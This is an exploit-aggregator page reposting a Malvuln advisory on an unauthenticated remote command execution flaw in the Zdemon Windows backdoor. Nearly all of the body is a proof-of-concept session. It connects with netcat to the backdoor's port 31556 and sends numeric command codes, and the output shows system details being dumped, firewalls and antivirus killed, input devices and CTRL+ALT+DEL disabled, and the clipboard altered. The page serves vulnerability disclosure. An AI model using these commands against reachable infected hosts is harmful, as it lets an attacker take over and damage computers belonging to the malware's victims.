Exploit for Backdoor.Win32.Zdemon.10 Remote Command Execution

Name: Exploit for Backdoor.Win32.Zdemon.10 Remote Command Execution
Rating: 5 (553 reviews)
2021-08-06 | CVSS -0.0
## https://sploitus.com/exploit?id=PACKETSTORM:163750
Discovery / credits: Malvuln - malvuln.com (c) 2021  
Original source: https://malvuln.com/advisory/d12f38e959d70af76fd263aa1933033c.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln  
  
Threat: Backdoor.Win32.Zdemon.10  
Vulnerability: Unauthenticated Remote Command Execution   
Description: Zdemon malware listens on TCP ports 31556, 6051. Third-party attackers who can reach infected systems can execute commands made available by the backdoor.  
Type: PE32  
MD5: d12f38e959d70af76fd263aa1933033c  
Vuln ID: MVID-2021-0313  
Disclosure: 08/05/2021  
  
Exploit/PoC:  
nc64.exe x.x.x.x 31556  
001  
112  
112Victim 01  
1.11002  
002 [ PC Details ]  
  
User name : Victim  
Computer name : DESKTOP-2C3IQHO  
Registered owner :  
Registered organisation :  
Processor name : Intel64 Family 6 Model 158 Stepping 9  
Processor speed : ~2894 MHz  
Memory : 2047.488 Mb  
Resolution : 1569x802  
Default printer :  
Free disk space : 3,818  
  
003  
003 [ OS Details ]  
  
Operating System :  
Version :  
Version No. :  
Platform ID. : Win32 on Windows NT  
Product key :  
Windows language : English (United States)  
TimeZone : @tzres.dll,-111  
DirectX version : 4.09.00.0904  
Windows folder : C:\WINDOWS  
System folder : C:\WINDOWS\system32  
Temp folder : C:\Users\Victim\AppData\Local\Temp\  
ProgramFiles folder : C:\Program Files (x86)  
NumLock state : Off  
CapsLock state : Off  
ScrollLock state : Off  
Play sounds : Yes  
Current time : 4/5/2021 3:13:18 AM  
Minutes in windows : 724 mins  
  
0010077  
000Blackhole is running on screen.  
.078  
000Stopped blackhole.   
0010110Mailbox not found.116  
0010075  
000Screen is fliped.  
0010080  
001  
0010081  
000Chat Window is closed.080  
000User clicked : [ OK ]000User clicked : [ OK ]  
0010090  
090about:blank091  
001  
0010091 hyp3rlinx.altervista.org  
000Homepage is set.  
0010014  
000Monitor is on now.  
001  
0010005  
005 [ Email Details ]  
  
POP3 UserName : none  
POP3 Server : none  
SMTP UserName : none  
SMTP Email Address none:  
SMTP Server : none  
001  
0010014  
000Monitor is on now.015  
000CD-ROM was been opened.016  
000CD-ROM was been closed.017  
000Mouse disabled.018  
000Mouse trails disabled.019  
000Mouse buttons restored.020  
000Crazy mouse is stopped021  
000Crazy mouse is stopped022  
1569x802, 256 colors023  
000Resolution is changed.024  
001  
0010025  
000CTRL+ALT+DEL disabled.001  
0010026  
000NumLock button disabled.001  
0010027  
000CapsLock button disabled.001  
0010028  
000ScrollLock button disabled.001  
0010029  
02915:44:19|4/5/2021001  
0010030  
000! Can't change remote time.001  
0010031  
000! Can't change remote date.001  
0010032  
000Clipboard is empty or not as text-format.001  
0010033  
000Clipboard content changed.001  
0010034  
000Clipboard cleared.001  
0010035  
000Clipboard enabled.001  
0010036  
000Screen saver was been started.0037  
001  
0010038  
001  
000Firewalls were been killed.0010001  
0010039  
001  
000AntiVirus were been killed.00100  
001  
0010040  
001  
0010041  
65796001Manager[DESKTOP-2C3IQHO\Victim]+ (Administrator)  
0010042  
000Window is hidden now.001  
0010042  
000Window is hidden now.001  
00100043  
004 [ Network Details ]  
  
Workgroup :  
Computer name :  
File sharing :  
Print sharing :  
Server list :  
Registered owner :  
Registered organisation :  
001  
0010044  
000Window is minimized now.001  
0010045  
000Window is maximized now.001  
0010046  
000Window was been closed.001  
0010047  
000Window is active now.001  
0010048  
000The X button is disabled.001  
0010049  
000Window title was been changed.001  
0010049  
000Window title was been changed.001  
0010050  
000! Error on trying to enable keylogger.001  
0010051  
051= Unable to get cache passwords on WinNT platform. =001  
0010055  
001  
0010056  
000Capturing stopped.001  
0010057  
001  
0010058  
000Taskbar is invisible now.001  
0010059  
000Taskbar is disabled now.001  
0010060  
000Desktop icons are invisible now.001  
0010061  
000Desktop icons are disabled now.001  
0010062  
000Start button is invisible now.001  
0010063  
000Start button is disabled now.001  
0010064  
000Start menu was beed opened.001  
0010065  
000Taskbar icons are invisible now.001  
0010066  
000Quick launch bar is invisible now.001  
0010067  
000Wallpaper is removed now.001  
0010068  
000Task clock is invisible now.001  
0010069  
000Task rebar is invisible now.001  
0010070  
000All windows are minimized now.001  
0010071  
000Flashing lights are run now.00  
001  
0010072  
000Flashing lights are stopped now.001  
  
(114 terminates the backdoor)  
001  
0010114  
  
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).